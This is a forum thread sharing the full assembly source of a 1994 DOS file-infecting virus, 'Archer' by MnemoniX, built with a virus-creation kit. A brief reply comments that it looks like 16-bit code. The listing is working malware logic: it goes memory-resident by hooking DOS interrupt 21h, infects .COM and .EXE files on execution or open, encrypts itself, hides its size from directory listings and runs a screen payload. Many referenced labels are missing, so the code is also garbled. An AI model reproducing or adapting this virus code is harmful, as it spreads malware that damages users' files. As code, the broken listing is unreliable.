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    assembly virus source tahun 1994

    Budak Script
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    assembly  virus source tahun 1994 Empty assembly virus source tahun 1994

    Post by hAxer Thu Feb 12, 2009 5:23 am

    ; archer.asm : [Archer] MnemoniX `94
    ; Created with Biological Warfare - Version 0.90á by MnemoniX

    PING equ 0AE3Bh
    PONG equ 0CD28h
    STAMP equ 30
    MARKER equ 04D4Dh

    code segment
    org 0
    assume cs:code,ds:code

    db 0E9h,3,0 ; to virus
    db 0CDh,20h,0 ; host program

    db 0BBh ; decryption module
    code_offset dw offset virus_code
    mov dx,VIRUS_SIZE / 2 + 1

    db 02Eh,081h,07h ; ADD CS:[BX]
    cipher dw 0
    inc bx
    inc bx
    dec dx
    jnz decrypt

    call $ + 3 ; BP is instruction ptr.
    pop bp
    sub bp,offset $ - 1

    push ds es

    mov ax,PING ; test for residency
    int 21h
    cmp bx,PONG
    je installed

    mov ax,es ; Get PSP
    dec ax
    mov ds,ax ; Get MCB

    sub word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64
    sub word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64
    mov es,word ptr ds:[12h]

    push cs ; copy virus into memory
    pop ds
    xor di,di
    mov si,bp
    mov cx,(virus_end - start) / 2 + 1
    rep movsw

    xor ax,ax ; capture interrupts
    mov ds,ax

    sub word ptr ds:[413h],(MEM_SIZE+1023) / 1024

    mov si,21h * 4 ; get original int 21
    mov di,offset old_int_21

    mov word ptr ds:[si - 4],offset new_int_21
    mov ds:[si - 2],es ; and set new int 21

    call activate ; activation routine

    pop es ds ; restore segregs
    cmp sp,MARKER ; check for .EXE
    je exe_exit

    lea si,[bp + host] ; restore host program
    mov di,100h
    push di

    call fix_regs ; fix up registers
    ret ; and leave
    mov ax,ds ; fix up return address
    add ax,10h
    add ax,cs:[bp + exe_cs]
    mov cs:[bp + return_cs],ax

    mov ax,cs:[bp + exe_ip]
    mov cs:[bp + return_ip],ax
    mov sp,[bp + exe_sp] ; restore SP

    call fix_regs ; fix up registers
    db 0EAh ; back to host program
    return_ip dw 0
    return_cs dw 0

    exe_cs dw -16 ; orig CS:IP
    exe_ip dw 103h
    exe_sp dw -2 ; orig SP

    xor ax,ax
    xor bx,bx
    mov si,100h
    xor di,di

    ; interrupt 21 handler
    call dword ptr cs:[old_int_21]

    cmp ax,PING ; residency test
    je ping_pong
    cmp ax,4B00h ; execute program
    je execute
    cmp ah,3Dh ; file open
    je file_open
    cmp ah,11h ; directory stealth
    je dir_stealth
    cmp ah,12h
    je dir_stealth
    db 0EAh ; never mind ...
    old_int_21 dd 0

    mov bx,PONG

    call int_21 ; get dir entry
    test al,al
    js dir_stealth_done

    push ax bx es
    mov ah,2Fh
    int 21h

    cmp byte ptr es:[bx],-1 ; check for extended FCB
    jne no_ext_FCB
    add bx,7
    mov ax,es:[bx + 17h] ; check for infection marker
    and al,31
    cmp al,STAMP
    jne dir_fixed

    sub word ptr es:[bx + 1Dh],VIRUS_SIZE + 3
    sbb word ptr es:[bx + 1Fh],0
    pop es bx ax

    push ax cx di es
    call get_extension
    cmp [di],'OC' ; .COM file?
    jne perhaps_exe ; perhaps .EXE then
    cmp byte ptr [di + 2],'M'
    jne not_prog
    jmp a_program
    cmp [di],'XE' ; .EXE file?
    jne not_prog
    cmp byte ptr [di + 2],'E'
    jne not_prog
    pop es di cx ax
    jmp execute ; infect file
    pop es di cx ax
    jmp int_21_exit

    push ax bx cx dx si di ds es

    xor ax,ax ; critical error handler
    mov es,ax ; routine - catch int 24
    mov es:[24h * 4],offset int_24
    mov es:[24h * 4 + 2],cs

    mov ax,4300h ; change attributes
    int 21h

    push cx dx ds
    xor cx,cx
    call set_attributes

    mov ax,3D02h ; open file
    call int_21
    jc cant_open
    xchg bx,ax
    push cs ; CS = DS
    pop ds

    mov ax,5700h ; save file date/time
    int 21h
    push cx dx
    mov ah,3Fh
    mov cx,28
    mov dx,offset read_buffer
    int 21h

    cmp word ptr read_buffer,'ZM' ; .EXE?
    je infect_exe ; yes, infect as .EXE

    mov al,2 ; move to end of file
    call move_file_ptr

    cmp dx,65279 - (VIRUS_SIZE + 3)
    ja dont_infect ; too big, don't infect

    sub dx,VIRUS_SIZE + 3 ; check for previous infection
    cmp dx,word ptr read_buffer + 1
    je dont_infect

    add dx,VIRUS_SIZE + 3
    mov word ptr new_jump + 1,dx

    add dx,103h
    call encrypt_code ; encrypt virus

    mov dx,offset read_buffer ; save original program head
    int 21h
    mov ah,40h ; write virus to file
    mov cx,VIRUS_SIZE
    mov dx,offset encrypt_buffer
    int 21h

    xor al,al ; back to beginning of file
    call move_file_ptr

    mov dx,offset new_jump ; and write new jump
    int 21h

    pop dx cx
    and cl,-32 ; add time stamp
    or cl,STAMP ; for directory stealth
    mov ax,5701h ; restore file date/time
    int 21h

    pop ds dx cx ; restore attributes
    call set_attributes

    mov ah,3Eh ; close file
    int 21h

    pop es ds di si dx cx bx ax
    jmp int_21_exit ; leave

    mov ax,4301h
    int 21h

    pop cx dx ; can't infect, skip
    jmp close

    mov ah,42h ; move file pointer
    xor cx,cx
    int 21h

    mov dx,ax ; set up registers
    mov ah,40h
    mov cx,3
    cmp word ptr read_buffer[26],0
    jne dont_infect ; overlay, don't infect

    cmp word ptr read_buffer[16],MARKER
    je dont_infect ; infected already

    les ax,dword ptr read_buffer[20]
    mov exe_cs,es ; CS
    mov exe_ip,ax ; IP

    mov ax,word ptr read_buffer[16]
    mov exe_sp,ax ; SP
    mov word ptr read_buffer[16],MARKER
    mov ax,4202h ; to end of file
    xor cx,cx
    int 21h

    push ax dx ; save file size

    push bx
    mov cl,12 ; calculate offsets for CS
    shl dx,cl ; and IP
    mov bx,ax
    mov cl,4
    shr bx,cl
    add dx,bx
    and ax,15
    pop bx

    sub dx,word ptr read_buffer[8]
    mov word ptr read_buffer[22],dx
    mov word ptr read_buffer[20],ax

    pop dx ax ; calculate prog size

    add ax,VIRUS_SIZE + 3
    adc dx,0
    mov cx,512 ; in pages
    div cx ; then save results
    inc ax
    mov word ptr read_buffer[2],dx
    mov word ptr read_buffer[4],ax
    mov dx,word ptr read_buffer[20]
    call encrypt_code ; encrypt virus

    mov ah,40h
    mov cx,VIRUS_SIZE + 3
    mov dx,offset encrypt_buffer
    int 21h

    mov ax,4200h ; back to beginning
    xor cx,cx
    int 21h

    mov ah,40h ; and fix up header
    mov cx,28
    mov dx,offset read_buffer
    int 21h
    jmp fix_date_time ; done

    courtesy_of db '[BW]',0
    signature db '[Archer] MnemoniX `94',0

    xor ah,ah ; get system time
    int 1Ah
    cmp dl,0F1h
    jb no_activate

    mov ah,0Fh ; get display page
    int 10h

    mov al,dl ; random number, 0-15
    and al,15

    mov ah,3 ; activating - get cursor
    int 10h ; position and save
    push dx

    mov dh,al ; set cursor at random
    xor dl,dl ; row, column 1
    mov ah,2
    int 10h

    mov di,79
    mov cx,1

    mov ax,91Ah ; print arrow and erase
    mov bl,10 ; 79 times
    int 10h

    push cx ; time delay
    mov cx,-200
    rep lodsb
    pop cx

    mov ah,2
    mov dl,' '
    int 21h

    dec di
    jnz arrow

    pop dx ; reset cursor
    mov ah,2
    int 10h ; and we're done


    push ds ; find extension
    pop es
    mov di,dx
    mov cx,64
    mov al,'.'
    repnz scasb

    push ax cx

    push dx
    xor ah,ah ; get time for random number
    int 1Ah

    mov cipher,dx ; save encryption key
    pop cx
    add cx,virus_code - virus_begin
    mov code_offset,cx ; save code offset

    push cs ; ES = CS
    pop es

    mov si,offset virus_begin ; move decryption module
    mov di,offset encrypt_buffer
    mov cx,virus_code - virus_begin
    rep movsb

    mov cx,VIRUS_SIZE / 2 + 1
    lodsw ; encrypt virus code
    sub ax,dx
    loop encrypt

    pop cx ax

    mov al,3 ; int 24 handler
    new_jump db 0E9h,0,0

    VIRUS_SIZE equ virus_end - virus_begin
    read_buffer db 28 dup (?) ; read buffer
    encrypt_buffer db VIRUS_SIZE dup (?) ; encryption buffer


    MEM_SIZE equ end_heap - start

    code ends
    end start
    Budak Baru
    Budak Baru

    Posts : 8
    Join date : 18/06/2009

    assembly  virus source tahun 1994 Empty Re: assembly virus source tahun 1994

    Post by funtikar Sat Jun 20, 2009 11:13 pm

    nmpk cam 16bit jer..

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